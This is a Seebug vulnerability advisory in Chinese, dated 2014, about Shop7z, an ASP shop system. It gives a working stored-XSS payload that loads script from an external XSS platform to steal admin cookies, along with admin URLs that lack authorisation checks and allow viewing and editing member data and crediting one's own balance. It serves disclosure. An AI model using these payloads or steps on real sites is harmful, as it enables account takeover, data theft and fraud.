Shop7z多个漏洞大礼包

2014-08-12T00:00:00
ID SSV:95981
Type seebug
Reporter Root
Modified 2014-08-12T00:00:00

Description

简要描述:

前台存储型XSS打后台,后台限制不严导致敏感数据访问,自己给自己充值TAT,等等····

详细说明:

0x01 前台XSS,使用官方最新的免费版源代码 在注册用户的时候,地址当中输入XSS代码 "><script src=http://xsser.l1n3.net/WY6NN2?1407683427></script> 如图

<img src="https://images.seebug.org/upload/201408/1023265040724c5236983bbd2bcc17a17a5a608d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

然后注册,显示注册成功

<img src="https://images.seebug.org/upload/201408/1023272808d10e43ec30a3f8186f562669451834.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

这时候查看一下后台---会员信息管理--会员管理---该会员详细信息

<img src="https://images.seebug.org/upload/201408/10234150250f3010733e106134db42b6de070999.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

可以看到xss代码已经插进去了 而xss平台也能收到cookies信息

<img src="https://images.seebug.org/upload/201408/10234214668fb15ce78b8c4c4698ec5bf4cfff52.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

0x02 未授权访问 http://127.0.0.1/admin/huiyuandetail.asp?id=831 该地址在免费版中未做权限检查,导致可以直接在这里遍历会员信息,同时可以修改任意会员信息 相关代码 huiyuandetail.asp中检查过了,无权限相关检查,包含的两个文件,一个conn中给了一个cookies conn.asp

8 m_user=session("m_user") 9 m_gold=session("m_gold")

另一个check4.asp是空文件,无用 导致了未授权的访问,完全可以遍历用户信息

<img src="https://images.seebug.org/upload/201408/102356510aa1d62ff22402613243a4bdefcbfc10.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

0x03 业务逻辑导致给自己充钱 依然是之前的未授权访问,访问 http://127.0.0.1/admin/Chongzhiadd.asp 然后选择会员,我选择自己

<img src="https://images.seebug.org/upload/201408/10235139e1dceba8e4e9be8f66dacafc0995cb08.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

冲他个百八十万的,我也是土豪,嘎嘎,然后直接确定, 查看充值记录

<img src="https://images.seebug.org/upload/201408/1023534875def4ac5d0093b3aa21d01a59e343bd.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/1023535465cf3a6bc08b844a9fe442f0ac94dad6.png" alt="10.png" width="600" onerror="javascript:errimg(this);">

好了,瞬间变土豪.... 还有一些其他的漏洞,暂时还没测试出来,等下一波再发吧

漏洞证明:

<img src="https://images.seebug.org/upload/201408/102356510aa1d62ff22402613243a4bdefcbfc10.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/10234150250f3010733e106134db42b6de070999.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/10234214668fb15ce78b8c4c4698ec5bf4cfff52.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/1023535465cf3a6bc08b844a9fe442f0ac94dad6.png" alt="10.png" width="600" onerror="javascript:errimg(this);">